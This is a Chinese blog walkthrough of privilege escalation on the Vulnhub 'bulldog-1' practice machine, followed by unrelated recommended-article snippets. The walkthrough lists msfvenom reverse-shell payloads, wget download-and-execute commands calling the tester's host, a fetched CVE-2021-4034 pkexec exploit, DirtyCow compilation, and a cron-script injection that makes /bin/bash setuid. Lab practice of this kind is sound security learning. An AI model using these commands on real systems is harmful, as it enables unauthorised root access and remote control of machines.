Vulnhub靶场渗透测试 bulldog-1 非预期CVE-2017-16995,CVE-2021-4034

已于 2024-07-06 22:18:39 修改
阅读量113 收藏
点赞数 3
文章标签: 服务器 运维
于 2024-07-01 09:02:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29060627/article/details/140091560
版权

Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/
 
脏牛提权失败(在2016年公布的漏洞,ubuntu16.04 可能补上了 )
 

测试Linux是否有DirtyCow漏洞
https://blog.csdn.net/lee_ham/article/details/82048681


curl -4LO https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c


gcc -static -pthread dirtyc0w.c -o dirtyc0w.s





root@bulldog:/tmp# su - django
-su-4.3$ id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
-su-4.3$ cd /tmp/
-su-4.3$ 
-su-4.3$ ./dirtyc0w.s foo m00000000000000000
mmap f77e3000

madvise 0

procselfmem -100000000

-su-4.3$ cat foo
this is not a test
-su-4.3$ 


CVE-2017-16995提权成功
 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.130 -a x86 -e x86/shikata_ga_nai --platform linux LPORT=4443 -f elf > x86.elf;
 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 -a x64 -e  x64/xor  --platform linux LPORT=4444 -f elf > x64.elf;
 
 
 
wget 192.168.111.130/x86.elf;chmod 0777 x86.elf;./x86.elf&
wget 192.168.111.130/x64.elf;chmod 0777 x64.elf;./x64.elf&
 
 
msfconsole
handler -H 192.168.111.130 -P 4443 -p linux/x86/meterpreter/reverse_tcp
handler -H 192.168.111.130 -P 4444 -p linux/x64/meterpreter/reverse_tcp
 

 
set PAYLOAD linux/x86/meterpreter/reverse_tcp
use exploit/linux/local/bpf_sign_extension_priv_esc
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.111.130
set LPORT 4445
set session 7
run





CVE-2021-4034 提权成功
 
msf6 > info exploit/linux/local/pkexec  #  利用失败(x86  x64  都失败)
 
 
 
cd /tmp;
wget -4O CVE-2021-4034.tar.gz  https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
tar -zxvf  CVE-2021-4034.tar.gz;
cd CVE-2021-4034-main;ll;env;make;
 
 
 
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ make
 
 
 
django@bulldog:/tmp$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(django)
#/usr/bin/pkexec   --version
pkexec version 0.105




cron计划任务:

django@bulldog:/etc/cron.d$ ll
total 24
drwxr-xr-x  2 root root 4096 Aug 25  2017 ./
drwxr-xr-x 96 root root 4096 Jun 30 07:23 ../
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  191 Aug 24  2017 popularity-contest
-rw-r--r--  1 root root   54 Aug 25  2017 runAV
django@bulldog:/etc/cron.d$ cat runAV 
*/1 * * * * root /.hiddenAVDirectory/AVApplication.py
django@bulldog:/etc/cron.d$ 
 
 
 
ls -al /.hiddenAVDirectory/AVApplication.py;
cat /.hiddenAVDirectory/AVApplication.py;
 
 
 
echo "import os;os.system('touch /tmp/12345;chmod u+s /bin/bash');">>/.hiddenAVDirectory/AVApplication.py;
 
 
 
django@bulldog:/tmp$ id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
django@bulldog:/tmp$ bash -p
bash-4.3# id
uid=1001(django) gid=1001(django) euid=0(root) groups=1001(django),27(sudo)
bash-4.3# ls -al /bin/bash
-rwsr-xr-x 1 root root 1037528 May 16  2017 /bin/bash
bash-4.3#

安河桥北2025
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
「干货」橙留香博客导读:专栏系统分类和博客归纳总结
橙留香Park的博客
03-28 3190
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球;为了更好地帮助博友同学学习作者同学的博客,方便作者同学自己归纳总结专栏,本文详细介绍了博主同学在CSDN写的各种专栏... ...
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
[网络安全提高篇] 一一八.恶意软件静态分析经典工具Capa批量提取静态特征和ATT&CK技战术
杨秀璋的专栏
03-20 2554
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文详细介绍恶意代码静态分析经典工具Capa的基础用法,这篇文章将详细讲解Capa批量提取静态特征和ATT&CK技战术,主要是从提取的静态特征Json文件中提取关键特征。此外,Capa支持IDA插件操作,方便安全人员快速定位恶意代码,且能与ATT&CK框架和MBC映射。基础性文章,希望对您有帮助。
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
热门推荐
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
atomic-bulldog-grid::office_building:基于CSS网格布局CSS(SCSS)网格,具有@supports后退到flexbox
02-05
原子牛头犬网格 :collision: :dog_face: CSS(SCSS)网格,基于具有@supportsCSS网格布局回退到flexbox... Atomic Bulldog是基于原子设计方法的Scss(Sass)样板。 它集成了Node KSS以自动生成实时样式指南/样式库。
yolo-pet:yolo实时宠物检测和识别
05-12
YOLO宠物YOLO实时宠物检测和识别用于使用或测试从我们的下载经过训练的体重文件,或者自己进行训练。 克隆项目git clone https://github.com/pjreddie/darknet cd darknet 修改yolo源代码vim examples/yolo.c 创建一...
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
Bulldog-Bucks:一个用于管理Gonzaga的Bulldog Bucks的Android应用程序
05-14
Bulldog Bucks专为Gonzaga大学的学生设计,可快速轻松地管理他们的Bulldog Bucks。 这个Android应用程式的灵感来自创建 。 学生ID和PIN仅在本地存储在移动设备上。 从安装android应用程序,或从此存储库下载源...
Linux 命令 —— top命令(查看进程资源占用)
longool的博客
07-14 1187
top 命令是 Linux/Unix 系统中常用的进程监控工具,可以实时显示系统中各个进程的资源占用情况,是一个快照信息,包括CPU、内存等。进入 linux 系统,直接输入 top,回车,就会显示如下所示的信息。1、第一行:时间上的统计top - 15:10:50:表示当前系统的时间是15:10:50;up 10 min:表示系统当前已经运行了10分钟。user:表示当前登录系统的用户数为1。
什么样的服务器是合乎直销网站标准
2301_78491269的博客
07-15 285
对于我们投资较少、刚刚起步的做网站直销公司来说,当然没有条件也没有必要来投资数千万、甚至数亿元来建立自己的数据中心,我们要做的就是选择一个合适的服务器租用商,租用他们优质的服务器,来保证发挥出该服务器的最大作用。工业设计包括了最基础的模块化和免螺丝设计,可以让运维人员实现免工具的快速拆装,以及可以有效防止和避免误操作的防呆设计等细节,此外机箱内的风道设计、散热效率、风扇与电源的配合、降噪与防震设计等等,都可以反映出厂家在相关技术及工业设计方面的实力高低。做网站直销选择租用服务器需要注意的几点要素。
【Linux】:文件fd
Yikefore的博客
07-14 823
文件fd的详细解析!
深入解析 Python 文件操作利器 —— shutil
最新发布
阔码人生
07-16 500
shutil库作为 Python 文件操作的利器,为我们提供了丰富且强大的功能,从文件的复制、移动、重命名到文件的压缩与解压缩,无所不包。通过灵活运用shutil库,您可以高效地管理和操作文件,极大提升工作效率。希望本文能帮助您全面掌握shutil库的各种技巧,在实际应用中得心应手。
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值